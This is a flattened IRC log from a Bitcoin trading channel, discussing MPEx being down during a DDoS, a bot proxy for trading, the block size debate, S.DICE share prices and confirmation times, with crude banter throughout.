http://2.bp.blogspot.com/_lBXQVHyQ1VA/TNczMI1ojSI/AAAAAAAAAq4/7tE5YUtGIz4/s1600/Tank_over_car.jpg Mar 08 07:07:27 car that tried to argue with a tank. Mar 08 07:07:39 the client is beyond broken. Mar 08 07:07:50 actually it may be the worst piece of crap ever used by this many people. Mar 08 07:09:18 so you're gonna make your own client, that'll have your branch (exclusion of '1dice') in there native? Mar 08 07:09:22 simple illustrative point : i can pick a torrent worth 7gb right now, anything with less than 20 seeders Mar 08 07:09:27 and it will be downloaded in an hour. Mar 08 07:09:36 this means blockchain MUST be downloaded in 15 minutes tops. Mar 08 07:09:37 TOPS. Mar 08 07:09:48 yeah, torrents are uber fast Mar 08 07:09:53 until the point that's the case none of you people have any business eating even. Mar 08 07:10:06 forget having oppinions. just tap the kbd till it does it. Mar 08 07:10:19 lots of info for SD investors to speculate on Mar 08 07:10:47 vote with your coins! Mar 08 07:10:52 lol Mar 08 07:11:09 i think this entire chat would be insider trading somehow Mar 08 07:11:23 now all we have to do is collude Mar 08 07:11:26 publicly Mar 08 07:11:29 bah Mar 08 07:11:45 It's IRC this is public enough... Mar 08 07:12:00 you would think, but... Mar 08 07:12:02 it is? Mar 08 07:12:32 any one know who Guest 11382 is? Mar 08 07:15:15 mhm anyone think bfl wont deliver by april? Mar 08 07:15:57 april 1st Mar 08 07:16:17 deliver you a big box with a letter inside it asking for money money Mar 08 07:16:22 more Mar 08 07:16:24 I bet they might, BitCOin's just playmoney anyway Mar 08 07:17:38 gah Mar 08 07:22:45 At least BitBet is online... Mar 08 07:22:59 are tx's going through though? Mar 08 07:24:31 Investigating that now Mar 08 07:26:19 Blockchain saw it... Let's see if it confirms... Mar 08 07:27:11 well, this one isn't too old, and it's got 19 confs: http://blockchain.info/tx/d8dac0508d27e922f957c893c896f6f887a7dc614c1aec1c89b27b943ff5be0f Mar 08 07:27:28 ima keep lookin Mar 08 07:28:08 http://blockchain.info/tx-index/59136614/289e2dc6ac2cd1f3e8d5ec126741b304caf1e16b3e746eadd0a402dbc9910870 because the Dutch ar fucking Cuba's shit up right now... Mar 08 07:28:36 thanks BingoBongo Mar 08 07:31:42 You're welcome. It's one of those World Baseball Classic penny bets, because apparently that didn't have enough chutzpah to attract much interest. I've had too much vodka tonight to mess with the python script so I don't know at this weight if I will clear anything, but fuck it. Bitcoin is an MMORPG and that's what I'm telling the 5-0 Mar 08 07:32:43 for real lol Mar 08 07:34:17 hey mircea_popescu I have been out of the loop the last couple days. What's going on with MPEx? I see that it's down right now. Mar 08 07:34:22 Bitcoin is a drama role playing game and it just so happens the tokens to play the game happen to be valued quite a bit. Like WoW gold. Mar 08 07:34:56 im starting to think the same thing. like fast-times-at-btc-high. Mar 08 07:35:39 haha bingo, too true Mar 08 07:35:44 an expensive game of emotions Mar 08 07:36:12 SpNg well, past coupla days its been being ddosed Mar 08 07:36:28 finally yest they got the proxies and everything. Mar 08 07:36:33 working on bringing all back online. Mar 08 07:36:41 there's a forum post the girl made summing up everything Mar 08 07:36:58 mircea_popescu: seriously? wtf? you have a link to the post? Mar 08 07:37:03 ok 1 sec Mar 08 07:37:08 any public motive? Mar 08 07:37:11 https://bitcointalk.org/index.php?topic=138956.msg1598165#msg1598165 Mar 08 07:37:29 i dunno dood, god knows i'm well loved and i can't think of anyone or anything that'd have it in for me. Mar 08 07:38:09 haha. love it. Mar 08 07:38:28 Maybe Coinlab, You just debuted that OIX thing that kind of threatened to replace MT Gox spot... Though you presented it more modestly. Mar 08 07:38:51 BingoBongo maybe. Mar 08 07:39:08 tho tbh... what diff would it make to anyone if its gox spot or oix or a random number coming out of a hat. Mar 08 07:39:29 as long as it's the consensus it's as good as any other, for a service provider. Mar 08 07:40:11 I mean the girl's been hammering the Gox is dead mantra and some noobs seem to be trusting her for a change. You might have survived the game long enough that people start to assume you're legit. Mar 08 07:40:35 i think the legit part came in a while ago. Mar 08 07:40:41 ;;gpg info mircea_popescu Mar 08 07:40:41 User 'mircea_popescu', with keyid 8A736F0E2FB7B452, fingerprint 6160E1CAC8A3C52966FD76998A736F0E2FB7B452, and bitcoin address None, registered on Fri Jul 22 05:39:10 2011. http://bitcoin-otc.com/viewgpg.php?nick=mircea_popescu . Currently not authenticated. Mar 08 07:40:45 and the girl's been hammering the what ?! Mar 08 07:40:53 july 22, 2011 Mar 08 07:41:02 hammering BitHub Mar 08 07:41:04 that's been a while now, longer than most of us Mar 08 07:41:11 u* Mar 08 07:41:17 The Coinlab buying Gox's USD book threatens Gox's sustainability angle Mar 08 07:41:18 :B Mar 08 07:41:32 BingoBongo im not even sure they seriously want the #1 spot. Mar 08 07:41:35 Bingo incorrect Mar 08 07:41:52 Ah, that's just my reading. Mar 08 07:41:55 they're are many peeps many working on ways for americans to get around coinlab into gox Mar 08 07:41:56 but im pretty sure nothing was bought. Mar 08 07:42:24 ;;bc,tslb Mar 08 07:42:25 Time since last block: 19 minutes and 16 seconds Mar 08 07:42:32 of course Mar 08 07:42:33 i think you'll see a lil bump but gox should be okey :) Mar 08 07:44:33 I dunno yCombinator has all of that renting apartments out to methheads money Mircea, it was probably either bought, hyped, or humiliated. I don't think Gox was forced, but I say this with a low degree of confidence. Mar 08 07:44:50 BingoBongo i'm with pigeons on that score : Mar 08 07:44:55 BitHub I trust it will be smooth, but the newbs opions shape the shouting Mar 08 07:45:00 mtgox dispensed itself of the liabilitous us book Mar 08 07:45:19 quite ellegantly at that. Mar 08 07:45:43 Coinlab probably though it was a bargain Mar 08 07:46:13 it's how these things usually work. Mar 08 07:46:50 after the french fiasco they certainly didn't feel the need for a replay, so. Mar 08 07:47:14 it's a win-win : the noobs get bragging rights (which they don't know how to use, but hey, youth), mtgox gets out of some stick. Mar 08 07:47:27 the us public becomes even more underserved, isolated, ghettoized Mar 08 07:47:32 but then again that's unavoidable. Mar 08 07:47:47 Gox never really had the staff or skill to handle the low information customers Mar 08 07:48:02 moreover, there's some lessons being learned here. everyone wants to be more like mpex. Mar 08 07:48:42 be nice is there was something just as big or popular as mtgox Mar 08 07:48:45 at least 4 places Mar 08 07:48:57 not good to depend just on mtgox? Mar 08 07:49:06 maybe they'll crop up. Mar 08 07:49:23 the thing is tho, the net result of mtgox's however we call it, incompetence, being stretched too thin Mar 08 07:49:27 is that otc trade exploded,. Mar 08 07:49:48 ANd that's the crucial difference from 2011 Mar 08 07:49:54 they have been bleeding market share month by month by month. by now i wouldn't even bet they do a third. Mar 08 07:50:04 in 2011 they had 80% hands down Mar 08 07:50:30 this of course becomes problematic for pricing options. Mar 08 07:51:04 ;;bc,tslb Mar 08 07:51:05 Time since last block: 27 minutes and 56 seconds Mar 08 07:51:05 [HAVELOCK] [HIM] 1 @ 1.63 BTC [+] Mar 08 07:51:12 hardy fuckin har miners Mar 08 07:51:34 so is mpex going to do its own gox? :D Mar 08 07:51:56 And thus it came to pass that the splendid son of bright-minded Keleos, Mar 08 07:51:56 Dêmophôn, who was born to well-girded Metaneira Mar 08 07:51:59 cross your fingers and pray to dog Mar 08 07:52:04 well girded lol. that's a woman i'd like to meet. Mar 08 07:52:04 [HAVELOCK] [SDICE] 1 @ 0.4999988 BTC [+] Mar 08 07:52:10 BitHub nope Mar 08 07:52:18 awe Mar 08 07:52:29 it's not a business i know anything about whatsoever. Mar 08 07:52:41 nor do i think it has much future Mar 08 07:52:41 and that's stopped you before? Mar 08 07:52:43 lulz Mar 08 07:52:51 BitHub yea ? Mar 08 07:53:42 meh fiats Mar 08 07:54:00 accincta. Mar 08 07:54:04 do you suppose they meant tits ? Mar 08 07:54:05 or ass ? Mar 08 07:55:34 hehe Mar 08 07:55:41 this next block should be sizeable Mar 08 07:55:56 its such a good word, i use it for slang all the time Mar 08 07:56:18 but its a 250k limit so the joke's on me LOL Mar 08 07:56:31 i never understood how that 250k limit got to be there Mar 08 07:56:31 mod6 I would bet my bet makes it in this next block... Mar 08 07:56:41 yeah, it should Mar 08 07:56:53 mircea_popescu: yeah, that seems pretty strange to me now. Mar 08 07:56:55 1 TB limit Mar 08 07:56:58 raise dat limit Mar 08 07:57:06 mod6 and you see, here's the problem : Mar 08 07:57:21 recently i discovered the way bitcoind works is all quirky and based on assumptive limitations like that. Mar 08 07:57:28 im starting to think one or several idiots can't code Mar 08 07:57:34 and just write magic numbers everywhere Mar 08 07:57:41 never heard of code and data sepparation etc. Mar 08 07:58:29 do you believe there should be a block size limit at all? Mar 08 07:58:34 Another point for SD over most miners, BitcoinJ isn't as poorly coded as BitcoinD Mar 08 07:58:49 mod6 well, that's moot. there was one to begin with. Mar 08 07:59:08 BingoBongo i've never read it/used it Mar 08 07:59:20 oh... it seems to me that if 1 billion people send 1 satoshi in 5 years, it could be a 10gb block... who cares, process it Mar 08 07:59:44 maybe im just retarded Mar 08 08:00:17 i have been hit in the head a lot :S Mar 08 08:00:24 mod6 the problem here tho is that bitcoin as it is is bitcoin as it is. Mar 08 08:00:36 if i get married to you on the understanding that you always wear red underwear Mar 08 08:00:46 as stupid as that may turn out to be, it's still in the fucking contract Mar 08 08:00:59 mircea_popescu it still follows many of the arbitrary limits (because bitcoind), but the code organization is much better. Kind of sad because well, Java. Mar 08 08:01:03 right, so yeah, they wrote it in, no going back. Mar 08 08:01:19 now, the only way to change something like that is the way gavin proposed it Mar 08 08:01:30 ie, "let they who have anything to lose decide where it should be" Mar 08 08:01:59 they who have anything to lose are, of course, the miners. so a system where miners vote somehow on standard block size may be a replacement, maybe. Mar 08 08:02:16 BingoBongo ya srsly. why the fuck do these people make these choices. Mar 08 08:02:21 ruby on rails. java. what the fuck. Mar 08 08:02:41 maybe it's a bad idea for coders to be allowed to chose their language. Mar 08 08:03:04 na, gotta be able to pick the right tool for the job... but that doesn't always mean that the guy will make the best choice Mar 08 08:03:14 i can still use a butter knife as a screwdriver Mar 08 08:03:23 but its not best... im just retarded Mar 08 08:03:33 WordPress and a watch only wallet powered by ArmoryD is probably how I'd write a bitcoin site if I had to. Mar 08 08:04:10 yeah, wow. im blown away by some of this. how did I not zero in on these things? Mar 08 08:04:25 its like punching myself in the dick Mar 08 08:04:50 ;;bc,tslb Mar 08 08:04:51 Time since last block: 41 minutes and 42 seconds Mar 08 08:04:53 lol Mar 08 08:06:36 s;;ticker Mar 08 08:06:38 ;;ticker Mar 08 08:06:39 BTCUSD ticker | Best bid: 42.50000, Best ask: 42.75000, Bid-ask spread: 0.25000, Last trade: 42.50000, 24 hour volume: 78229.70545564, 24 hour low: 40.11000, 24 hour high: 45.50000, 24 hour vwap: 43.23642 Mar 08 08:06:58 Honestly the miners'll probably roll with whatever, making the margins work is their business. Let the pool operators cap block sizes and open up the daemon for everyone else. Mar 08 08:08:19 mod6 the bet made it in, miracle what a decent transaction fee can do Mar 08 08:09:24 there's problem with open ended blocksize Mar 08 08:09:28 for one, the bloat Mar 08 08:09:35 for the other, security strictly depends on the block being finite. Mar 08 08:09:42 and is inverse of the block length Mar 08 08:10:18 pragmatism will lead miners to cap the size of their own blocks unless they want to birth hydrocephalitic orphans Mar 08 08:10:56 BingoBongo: ok thanks man, i see you got one conf in this block: http://blockchain.info/block-index/355466/00000000000003bbf75f37b8a331938d6fb7dc61addf7bf6a97e95f8c9c0e5f0 Mar 08 08:11:46 right, well i guess you dont want people putting in the wayback machine into the blockchain... Mar 08 08:11:50 mod6 and it is the first one. BitBet shows the bet as registered as well Mar 08 08:12:02 good deal. Mar 08 08:12:09 http://www.vice.com/read/new-york-cops-will-arrest-you-for-carrying-condoms Mar 08 08:12:11 progress Mar 08 08:12:17 have a large soda in a condom Mar 08 08:13:16 yeah they're a bunch of Fascists Mar 08 08:13:33 hitler was against very against smoking too Mar 08 08:14:02 "Maybe some quota-filling cop thinks you look like a whore." Mar 08 08:14:29 Eh, take Canthaxanthin for a few months and walk around New York, some Cop will grab a real good feel. Mar 08 08:15:27 BingoBongo: 2 confs now... Mar 08 08:15:52 so at least with your .0025 fee, that was good enough Mar 08 08:16:37 mod6 It has been my standard fee for about a month now. I'm not patient enough to send with less. Mar 08 08:18:28 Even on small transactions it is cheaper than a wire Mar 08 08:19:52 *nod* Mar 08 08:20:27 what's that one do ? Mar 08 08:20:54 Canthaxanthin is a tanning pill Mar 08 08:21:03 lol Mar 08 08:21:09 a Mar 08 08:21:16 ok gentlemen. Mar 08 08:21:30 10 cents. seems legit. Mar 08 08:21:53 http://omg.yahoo.com/blogs/celeb-news/dita-von-teese-stuns-first-ever-3-d-175606524.html Mar 08 08:22:00 no, she's not baring cunt. it's worse. Mar 08 08:30:32 *hanbot* ? Mar 08 08:30:34 *hanbot* hi Mar 08 08:32:06 [HAVELOCK] [HIM] 1 @ 1.63 BTC [+] Mar 08 08:36:21 [MPEX] [S.MPOE] 8150 @ 0.00072776 = 5.9312 BTC [-] Mar 08 08:36:58 [MPEX] [S.MPOE] 5150 @ 0.00075 = 3.8625 BTC [+] Mar 08 08:38:05 [HAVELOCK] [KCIM] 1 @ 0.96000001 BTC [-] Mar 08 08:40:06 [HAVELOCK] [HIM] 1 @ 1.45 BTC [-] Mar 08 08:41:04 [HAVELOCK] [KCIM] 1 @ 1 BTC [+] Mar 08 08:41:16 [BTCTC] [COGNITIVE] 1 @ 0.24998 BTC [-] Mar 08 08:56:49 When will you fix MPEx Mar 08 08:57:49 hi Rick__ Mar 08 08:57:59 hang on for a minute here. Mar 08 09:00:51 $post ew4aaH8L Mar 08 09:00:54 mircea_popescu: Server's response: http://pastebin.com/gZhCDu2b Mar 08 09:01:04 I just got up to having my comp hacked....so what is your sitch now MP? Mar 08 09:02:12 $depth Mar 08 09:02:13 mircea_popescu: Server's response: http://pastebin.com/7iJS63TY Mar 08 09:02:17 $vwap Mar 08 09:02:18 mircea_popescu: Server's response: Post limit, maximum pastes per 24h reached Mar 08 09:02:25 heh Mar 08 09:02:25 wtf?!! Mar 08 09:02:39 i'm pro yo! Mar 08 09:02:41 anyone else in the channel have problem with attacks on their comp last night? Mar 08 09:02:51 ok so! what you folks see here is a historical moment. Mar 08 09:03:03 mpexbot is capable of proxing mpex trade server now. Mar 08 09:03:03 mircea_popescu: Error: "is" is not a valid command. Mar 08 09:03:16 cute. Mar 08 09:04:28 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [+] Mar 08 09:04:33 i guees not thx Mar 08 09:04:48 for watever reason mpexbot's pro pastebin feature of posting >25 posts per day hasn't been enabled yet Mar 08 09:04:51 so what's mpexbot? Mar 08 09:05:03 Rick__ it is a method of talking to mpex that can not be ddosed Mar 08 09:05:07 as it has no known ip. Mar 08 09:05:25 now, mpex infrastructure is being upgraded, and it will be back sometime today. Mar 08 09:05:27 okay,understand a bit Mar 08 09:05:48 Okay cool Mar 08 09:06:04 so many computer things that I dont understand Mar 08 09:06:25 [MPEX] [S.MPOE] 1337 @ 0.00075 = 1.0028 BTC [+] Mar 08 09:06:28 Rick__ :) Mar 08 09:06:49 1337 Mar 08 09:06:59 ok so, im closing the ordering now, because i don't want inconsistencies. this is all testnet stuff. Mar 08 09:07:09 but the good news is here to stay. mpexbot. Mar 08 09:07:58 is it hard to make a ticker from your api mircea? Mar 08 09:08:03 worst case scenario just moved to "if 10 Gb pipe isn't enough to stop ddos, we just trade via mpexbot" Mar 08 09:08:32 BitHub not really an api but still, i don't think so, it's all json after all. Mar 08 09:09:15 okey, hopefully i can feature a mpex ticker on my site soon, if its okey with you of course Mar 08 09:09:43 surely. Mar 08 09:10:05 :) sweet Mar 08 09:10:26 so what's the s.dice price now? Mar 08 09:10:49 what command can I use to check the price Mar 08 09:11:46 Rick__ the price hasn't appreciably changed since trade has been locked for the past ~12 hours Mar 08 09:11:54 the PTs trade about the same levels. Mar 08 09:12:03 !ticker btct gsdpt Mar 08 09:12:06 [BTCT:GSDPT] 1D: 0.00596 / 0.00599 / 0.00599 (92 shares, 0.6 BTC), 7D: 0.00261 / 0.00621 / 0.0065 (28529 shares, 177.2 BTC), 30D: 0.00261 / 0.00621 / 0.00687 (139940 shares, 868.7 BTC) Mar 08 09:12:12 !ticker havelock sdice Mar 08 09:12:14 [HAVELOCK:SDICE] 1D: 0.41510000 / 0.4566318 / 0.51000000 (197 shares, 89.95646538 BTC), 7D: 0.37000000 / 0.55221757 / 0.68700000 (1696 shares, 936.56099770 BTC), 30D: 0.37000000 / 0.63685913 / 0.76500000 (8993 shares, 5727.27416254 BTC) Mar 08 09:13:05 [HAVELOCK] [SDICE] 4 @ 0.4999988 = 2 BTC [+] Mar 08 09:13:07 [HAVELOCK] [SDICE] 5 @ 0.4999988 = 2.5 BTC [+] Mar 08 09:13:34 damn Mar 08 09:13:38 shoulda bought some dice shares Mar 08 09:13:42 coulda arb'd by now Mar 08 09:13:43 lol Mar 08 09:14:05 [HAVELOCK] [SDICE] 1 @ 0.49999999 BTC [+] Mar 08 09:14:32 lordy they tanked on bitfunder, .004 Mar 08 09:14:38 are they higher somewheres else? Mar 08 09:14:38 jesus Mar 08 09:14:44 that is low Mar 08 09:14:59 last s.dice trade on mpex was something like 0.0058 Mar 08 09:15:33 it rebounded Mar 08 09:15:36 gotta be in for the long haul and ho-pe or dump Mar 08 09:15:45 what should I do with 1600 shares on bitfunder? Mar 08 09:15:47 oh that Mar 08 09:15:52 hold and hope Mar 08 09:15:55 i doubt s.dice will be here for the long run Mar 08 09:16:09 i would dump and pump into jah mining and collect daily divs Mar 08 09:16:14 that's what i been doin Mar 08 09:16:31 I wouldn't be so sure about that. S.dice is more than just a dice game, it's a brand Mar 08 09:16:46 a brand> Mar 08 09:16:49 ? Mar 08 09:16:51 i had some jah, was good, but I can't get rid of these sdice. bought at .55 sold at 75, then bought back in at .6 cos I'm still learning, that's why Mar 08 09:17:01 lol Mar 08 09:17:18 so then if you sell at .4 you're even money Mar 08 09:17:22 just get rid of them all deadweasel Mar 08 09:17:44 and pump it into jah, anything you'll loose you'll make up in the dail divs Mar 08 09:17:44 if they are 58 on mpex, know anybody who wants them at .55! Mar 08 09:17:47 it's a firesale! Mar 08 09:18:10 yes, building brand awareness is expensive. the value of s.dice's brand awareness justifies the stock price alone. Mar 08 09:18:25 yeah, i'm going for divs only stocks these days. sdice may not make it to the next divs, as it is. the brand may make it through w/out the assets Mar 08 09:18:34 Some big gaming concern is probably going to come in and scoop up s.dice Mar 08 09:18:44 exactly, no more bitcoin divs Mar 08 09:18:55 lul gaming company Mar 08 09:18:55 they' Mar 08 09:19:01 who/where is JAH? Mar 08 09:19:07 the core of the community hates S.DICE Mar 08 09:19:09 An acquisition would be a great exit for all investors Mar 08 09:19:22 its spam Mar 08 09:19:24 That's not true - some of the core devs, not all Mar 08 09:19:31 we just had a 5 hour tango convo about this before Mar 08 09:19:37 sorry some :) Mar 08 09:19:40 There are enough mining pools who will always confirm s.dice transactions Mar 08 09:19:52 let's not start this again Mar 08 09:19:59 agreed :) Mar 08 09:20:04 agreed :) Mar 08 09:20:05 [HAVELOCK] [SDICE] 39 @ 0.5 = 19.5 BTC [+] Mar 08 09:20:13 its been a good day, have you seen all the giveaways on otc? Mar 08 09:20:27 i even got in on the action Mar 08 09:20:44 gave away some btc for twitter followers heh Mar 08 09:21:20 that's good business right now. +1s and followers and likes Mar 08 09:21:39 jah mining is on MPEX? I have never seen this or is it called something else Mar 08 09:21:42 bitpride is going to do the same thing as sdice? Mar 08 09:22:01 yep when i eventually get into full marketing mode i'll pay offering btc tips for peeps who paste their address to me on twitter or fb Mar 08 09:22:06 :) Mar 08 09:22:25 better than fb's advertising system Mar 08 09:22:27 you should automate it --- mechanical turk for likes. Mar 08 09:22:39 real people, can't get around that Mar 08 09:22:39 ahh i wish i could Mar 08 09:22:44 you could Mar 08 09:22:56 but the coding, programming stuff, me doing it? is like getting the janitor to fly the airplane Mar 08 09:23:01 instead of a pilot Mar 08 09:23:17 spend some time to interview local college kids for an 'internship'. orjust pay them shit Mar 08 09:23:39 lul i'm paying a few programmers on here atm, slowly Mar 08 09:23:39 until you get bigger then hire a better coder and scrap and redo Mar 08 09:23:44 it gets exe Mar 08 09:23:54 yup Mar 08 09:24:02 :) Mar 08 09:24:06 get the ones from india Mar 08 09:24:08 ZedsterX: no Mar 08 09:24:15 srsly though, expectations of bitpride? Mar 08 09:24:29 idk about bitpride Mar 08 09:24:34 um bitpride i was looking at those shares but felt a bit shy Mar 08 09:24:43 Namworld: thx so where is it listed? Mar 08 09:24:48 its cool its something different but i dont know Mar 08 09:24:48 I got a few shares for the heck of it. Mar 08 09:24:56 bitfunder.com Mar 08 09:25:06 i'd just rather have my btc going up than my shares going down. Mar 08 09:25:10 https://bitfunder.com/asset/JAH Mar 08 09:25:17 was buttfunder pointed at me? Mar 08 09:25:23 hehe thx guys Mar 08 09:25:29 mircea_popescu: http://pastebin.com/7iJS63TY has been removed already Mar 08 09:25:43 is jah the only onepaying daily divs on BF? Mar 08 09:25:45 maximian i think they die in 10 minutes Mar 08 09:25:52 everyone else is weekly or monthly yeah? Mar 08 09:25:54 ah, ok Mar 08 09:26:08 I like the idea… but what if pastebin gets DDoS'd? Mar 08 09:26:21 $vwap Mar 08 09:26:23 mircea_popescu: Server's response: Post limit, maximum pastes per 24h reached Mar 08 09:26:26 heh. Mar 08 09:26:30 that sucks Mar 08 09:26:32 maximian move to a diff one Mar 08 09:26:35 yeah Mar 08 09:26:40 need a higher limit Mar 08 09:26:43 maximian it's temporary tho. they've not credited the acct to pro status yet Mar 08 09:26:53 i see Mar 08 09:26:56 ddos sucks Mar 08 09:27:14 anyway, the surface keeps growing. Mar 08 09:27:15 is it really hard to combat it? Mar 08 09:27:24 now the attacker has to take out all pastebins too ? Mar 08 09:27:29 or just really expensive? Mar 08 09:27:42 BitHub it's impossible to combat it, in principle. Mar 08 09:27:55 shitty Mar 08 09:28:04 mpex is pretty much the only thing that even has a prayer at it, but otherwise... nope. Mar 08 09:28:16 ahh yep true Mar 08 09:28:17 they ARE expensive to do tho, so in a sense a self limiting condition Mar 08 09:28:19 when will be the new version of bitvps's website on? Mar 08 09:28:28 Rick__ today. Mar 08 09:28:37 o sorry Mar 08 09:28:39 any idea who's behind it? Mar 08 09:28:41 i thought you were asking about mpecx Mar 08 09:28:45 BitHub nope Mar 08 09:28:49 o,hehe Mar 08 09:28:54 bounty time? Mar 08 09:29:11 I have been waiting the new bitvps for a month Mar 08 09:29:21 they always say soon Mar 08 09:29:33 " * Show your support in asking the MPOE exchange where the S.DICE security is located, to de-list the security until the problem is addressed." Mar 08 09:29:36 free membership and 5btc to whoever finds Mar 08 09:29:57 guys a huge dump is happening Mar 08 09:30:03 https://bitcointalk.org/index.php?topic=150493.0 Mar 08 09:30:17 http://coinlab.com/ Mar 08 09:31:38 that misterbigg guy is a little slow Mar 08 09:31:56 just increase the min bet Mar 08 09:31:58 maximian he;s a funny guy. he was active in the s.dice thread back in august Mar 08 09:32:05 0.1 BTC per bet or gtfo Mar 08 09:32:06 then the girl found out about his dirty past Mar 08 09:32:09 so he took a break Mar 08 09:32:12 i see he's back now Mar 08 09:32:20 hehheh…I wonder why he bothers Mar 08 09:32:35 well, it took like over an hour to confirm my tx last night Mar 08 09:32:38 bitcoin is where the cool kids are. hard to stay away Mar 08 09:32:45 Bowjob i had some quwued for 6. Mar 08 09:32:49 damn Mar 08 09:32:50 lol Mar 08 09:33:06 imo we need a compromise. this blockchain bloat is annoying Mar 08 09:33:07 can i push from bitfunder to havelock? Mar 08 09:33:21 how about increasing the min bet on all dice games Mar 08 09:33:23 0.1 or gtfo Mar 08 09:33:29 that seems reasonable Mar 08 09:33:41 i like that idea, until BTC is worth $100, 1000 Mar 08 09:33:45 it wouldn't be that hard to get s.dice shut down Mar 08 09:33:49 i mean really Mar 08 09:34:08 they're based in usa right? Mar 08 09:34:13 I think Sdice needs to handle the issue on their end, do their own gambling fork. Mar 08 09:34:23 I do like all this s.dice exposure… being talked about is what keeps it on top Mar 08 09:34:23 i dunno I'm not a dev, Mar 08 09:34:41 yeah its good pr for sure Mar 08 09:34:41 anyway, how could I get my SDICE from bitfunder to havelock? Mar 08 09:35:41 They could easily take bitcoin deposits and have a fork for the sole purpose of calculating lucky numbers, nay? Mar 08 09:35:59 i just hope s.dice pays taxes Mar 08 09:36:01 giving a fork balance that can be cashed out... inconvenient tho Mar 08 09:36:04 for their sake Mar 08 09:36:14 Namworld nay Mar 08 09:36:17 I don't know about that. Mar 08 09:36:18 it wouldn't be trustworthy. Mar 08 09:37:50 yeah, i don't know. I have no solutions. just shrinking asset value. Mar 08 09:37:54 gaaw, wtf are these people on about, do the really thing some script,ajax heavy site would do better against a sustained ddos than a few
tags? Mar 08 09:38:16 which people ? Mar 08 09:38:21 the dice share holders will be opposed to delisting their shares Mar 08 09:38:25 wtf is mrbig thinking Mar 08 09:38:31 people like that mrbig and such Mar 08 09:38:33 define thinking. Mar 08 09:38:56 smickles the stupid want everything remade in their image Mar 08 09:39:20 that such nonsense would require throwing away the edges doesn't worry them : they don't know what those are anyway Mar 08 09:39:32 srsly, that was what I came back to when i went to the forum for the first time in a while Mar 08 09:39:44 "grinds my gears" so to speak Mar 08 09:40:11 the tx fees are there on top of the house edge yeah Mar 08 09:40:15 and all the chuckleheads talking about raising the blocksize Mar 08 09:40:38 yogs! all of them yogs! Mar 08 09:41:18 lol Mar 08 09:41:33 now imagine how bitcoin would work if it were you know... like fiat Mar 08 09:41:45 where the mobile vulgus actually had power. Mar 08 09:42:38 it's kind of interesting how this all worked out btw. the -otc and forum, home of the unwashed masses, all revolutionary and shit. the -assets, where the landed gentry naturally gathers, all conservative. Mar 08 09:43:07 apparently all political history is contained within people themselves. Mar 08 09:43:11 human nature at work Mar 08 09:49:24 so we're making history right now? Mar 08 09:52:37 well history is made all the time Mar 08 09:55:01 yeh but none of it really matters Mar 08 09:55:16 especially before the internet was born, real pointless stuff Mar 08 09:55:47 hehe Mar 08 09:56:06 i've liked how things have played out so far but are we about to see a real dark turn in the road? Mar 08 09:56:42 always the question. Mar 08 09:57:01 hmmm Mar 08 10:03:08 The whole issue is wildly overblown. Some extra action will be taken to penalize spammy transactions and the blocksize always had to go up at some point. Not right now though, I think. Mar 08 10:04:29 the issue is very polarizing for some reason Mar 08 10:05:47 did mpexbot get ddos'd too?! Mar 08 10:05:56 It's all the anarchists railing about the injustice (nay TYRANNY) of the concept that the blockchain shouldn't contain an unlimited amount of garbage. Mar 08 10:06:35 Bah, I need to stop phrasing it that way. I'm not doing any good with this noise. Mar 08 10:06:37 unlimited garbage is a problem, and needs to be dealt with Mar 08 10:07:15 It will be worked out, I'm sure people will be upset for a while. But when the sun rises the next day things will look brighter. Mar 08 10:07:22 agreed Mar 08 10:07:49 the drama is compelling, hence the topic goes on and on Mar 08 10:07:49 maximian haha nah Mar 08 10:08:26 OneMiner the problem is the definition, of course. Mar 08 10:09:01 selecting what is garbage is an overstretch of the licenses granted. Mar 08 10:09:01 We feed on it right? Here we are trying to adopt a new currency, pretty much out of the blue. Right away we are overly invested relative to the rest of the world. We are all a bit nutty. Mar 08 10:09:09 or in other words, the president don't have that authority. Mar 08 10:09:46 *hanbot* gmorning Mar 08 10:09:51 http://thebotnet.com/guides-and-tutorials/49828-how-to-access-the-hidden-wiki/ Mar 08 10:09:56 that first post is hysterical. Mar 08 10:10:03 mircea_popescu Except in this case we do have the authority. It's a collective as opposed to unilateral action. Mar 08 10:10:17 "a collective" is scarce basis for authority. Mar 08 10:10:28 What would be your standard? Mar 08 10:10:48 We all choose which clients to run right? There's the vote right there. Mar 08 10:10:49 unless you get your subject to agree with you, there's no basis. Mar 08 10:10:52 sure. Mar 08 10:11:02 Bam, problem solved. Mar 08 10:11:05 [HAVELOCK] [SDICE] 26 @ 0.5 = 13 BTC [+] Mar 08 10:11:16 if it actually was solvable that way therer wouldn't be all the whining. Mar 08 10:11:36 the problem is tghat there's no problem, and random selection of idiots are trying to manufacture one for poluitical reasons. Mar 08 10:11:42 which is ridiuclous, but hey, americans. Mar 08 10:11:42 Well... It WILL be solved that way and there STILL will be whining. Mar 08 10:11:51 thats how much they can do. Mar 08 10:13:03 It's ok though. The alt coins proove that there is no absolute authority. Miners each have a choice of what transactions to include, the world keep turning. Mar 08 10:13:14 indubitably. Mar 08 10:13:41 it's funny tho, because in real world politics people consider the media's focusing on margianl nonissues as signs of some sort of conspiracy. Mar 08 10:14:00 yet in bitcoin there's no media, and yet in bitcoin people focus on marginal nonissues instead of facing the hard stuff. like fixing the damned client. Mar 08 10:14:09 no conspiracy. just... the nature of the human herd. Mar 08 10:14:22 Cool. I just wanted to pop in with that PSA, the topic is on everybodies mind. :P I've been speaking about this all day. I'm going to bed. :) Mar 08 10:14:29 nn Mar 08 10:15:17 Damn... MPEx needs to come back up. I want to put some orders in =/ Mar 08 10:15:46 I don't hold their views against them. The details do matter. Maybe it's the need for sleep but I can sympathize to a degree. Mar 08 10:16:15 nn Mar 08 10:16:15 I have mpex withdrawal myself Mar 08 10:17:54 $vwap Mar 08 10:17:57 smickles: Server's response: Post limit, maximum pastes per 24h reached Mar 08 10:18:06 scumbag pastebin Mar 08 10:18:08 eh wtf is with them ppls. Mar 08 10:18:25 they have an excellent business model Mar 08 10:18:31 1. take you money Mar 08 10:18:32 ya. charge and don't deliver Mar 08 10:40:13 What's the new time estimates on MPEx availability? Mar 08 10:40:45 Should I just go sleep and come back tomorrow or is it almost done? Mar 08 10:41:41 [BTCTC] [BTC-MINING] 1 @ 0.0342 BTC [+] Mar 08 10:47:40 looks like time for bed Mar 08 10:48:10 yeah Mar 08 10:48:22 Nothing else to do. Mar 08 10:48:32 Goodbye Mar 08 11:00:29 namworld actually imminent Mar 08 11:00:32 o boy poor guy Mar 08 11:01:44 hehe Mar 08 11:03:21 [BTCTC] [BASIC-MINING] 2 @ 0.345 = 0.69 BTC [+] Mar 08 11:04:44 